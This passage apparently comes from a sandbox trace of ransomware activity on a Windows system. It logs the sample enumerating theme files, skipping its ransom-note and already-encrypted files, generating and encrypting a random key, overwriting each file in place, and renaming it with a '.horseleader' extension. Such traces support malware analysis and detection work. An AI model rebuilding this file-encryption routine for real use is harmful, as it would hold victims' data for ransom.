lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567e4730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="LAYERS", cAlternateFileName="")) returned 1 [0247.299] lstrcmpiW (lpString1="LAYERS", lpString2="Windows") returned -1 [0247.299] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS") returned 66 [0247.299] lstrcmpW (lpString1="LAYERS", lpString2=".") returned 1 [0247.299] lstrcmpW (lpString1="LAYERS", lpString2="..") returned 1 [0247.299] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.299] GetProcessHeap () returned 0x780000 [0247.299] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0247.299] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\*") returned 68 [0247.299] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567e4730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.301] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.301] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\.") returned 68 [0247.301] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.301] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567e4730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.301] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.301] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\..") returned 69 [0247.301] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0247.301] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.301] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x954c700, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x567e4730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x954c700, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xe743, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="LAYERS.ELM", cAlternateFileName="")) returned 1 [0247.301] lstrcmpiW (lpString1="LAYERS.ELM", lpString2="Windows") returned -1 [0247.301] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM") returned 77 [0247.301] StrStrIW (lpFirst="LAYERS.ELM", lpSrch=".horseleader") returned 0x0 [0247.301] lstrcmpW (lpString1="LAYERS.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.302] lstrcmpW (lpString1="LAYERS.ELM", lpString2="_uninstalling_.png") returned 1 [0247.302] lstrlenW (lpString=".testttjffg") returned 11 [0247.302] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM", lpSrch=".testttjffg") returned 0x0 [0247.302] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.302] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.302] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\layers.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x1a4 [0247.303] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM") returned 77 [0247.303] StrStrW (lpFirst="LAYERS.ELM", lpSrch=".txt") returned 0x0 [0247.303] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=59203) returned 1 [0247.303] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.306] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.306] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.307] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.308] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.308] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.308] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4743, lpOverlapped=0x0) returned 1 [0247.308] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb8bd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0247.309] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4743, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4743, lpOverlapped=0x0) returned 1 [0247.309] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.309] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.309] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.309] CloseHandle (hObject=0x1a4) returned 1 [0247.310] GetProcessHeap () returned 0x780000 [0247.310] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.310] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM.horseleader") returned 89 [0247.310] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\layers.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\layers.elm.horseleader")) returned 1 [0247.311] GetProcessHeap () returned 0x780000 [0247.311] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.311] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: 
lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x215, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="LAYERS.INF", cAlternateFileName="")) returned 1 [0247.311] lstrcmpiW (lpString1="LAYERS.INF", lpString2="Windows") returned -1 [0247.311] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF") returned 77 [0247.312] StrStrIW (lpFirst="LAYERS.INF", lpSrch=".horseleader") returned 0x0 [0247.312] lstrcmpW (lpString1="LAYERS.INF", lpString2="#Decrypt#.txt") returned 1 [0247.312] lstrcmpW (lpString1="LAYERS.INF", lpString2="_uninstalling_.png") returned 1 [0247.312] lstrlenW (lpString=".testttjffg") returned 11 [0247.312] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF", lpSrch=".testttjffg") returned 0x0 [0247.312] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.312] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.312] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\layers.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.314] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF") 
returned 77 [0247.314] StrStrW (lpFirst="LAYERS.INF", lpSrch=".txt") returned 0x0 [0247.314] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=533) returned 1 [0247.314] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x215, lpOverlapped=0x0) returned 1 [0247.315] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdeb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.316] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x215, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x215, lpOverlapped=0x0) returned 1 [0247.316] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.316] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.316] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.316] CloseHandle (hObject=0x1a4) returned 1 [0247.316] GetProcessHeap () returned 0x780000 [0247.317] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.317] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF.horseleader") returned 89 [0247.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF" (normalized: "c:\\program 
files\\common files\\microsoft shared\\themes14\\layers\\layers.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\layers.inf.horseleader")) returned 1 [0247.321] GetProcessHeap () returned 0x780000 [0247.321] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.321] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x67b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.321] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.321] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 78 [0247.321] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.321] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.321] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.321] lstrlenW (lpString=".testttjffg") returned 11 [0247.321] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.322] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.322] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.322] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.322] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 78 [0247.322] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.323] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1659) returned 1 [0247.323] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x67b, lpOverlapped=0x0) returned 1 [0247.325] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff985, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.325] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x67b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x67b, lpOverlapped=0x0) returned 1 [0247.326] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.326] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.326] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) 
returned 1 [0247.326] CloseHandle (hObject=0x1a4) returned 1 [0247.326] GetProcessHeap () returned 0x780000 [0247.327] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.327] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.horseleader") returned 90 [0247.327] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif.horseleader")) returned 1 [0247.328] GetProcessHeap () returned 0x780000 [0247.328] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.328] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xaf32, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.328] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.328] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 79 [0247.328] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.328] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 
[0247.328] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.328] lstrlenW (lpString=".testttjffg") returned 11 [0247.328] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.329] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.329] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.329] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.330] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 79 [0247.330] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.330] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=44850) returned 1 [0247.331] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.333] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.334] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.335] ReadFile (in: hFile=0x1a4, 
lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.335] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.336] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.336] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xf32, lpOverlapped=0x0) returned 1 [0247.336] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff0ce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.336] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xf32, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xf32, lpOverlapped=0x0) returned 1 [0247.337] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.337] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.337] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.337] CloseHandle (hObject=0x1a4) returned 1 [0247.337] GetProcessHeap () returned 0x780000 [0247.337] RtlAllocateHeap (HeapHandle=0x780000, 
Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.338] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.horseleader") returned 91 [0247.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png.horseleader")) returned 1 [0247.339] GetProcessHeap () returned 0x780000 [0247.339] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.339] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xaf32, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.339] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.339] wnsprintfW (in: 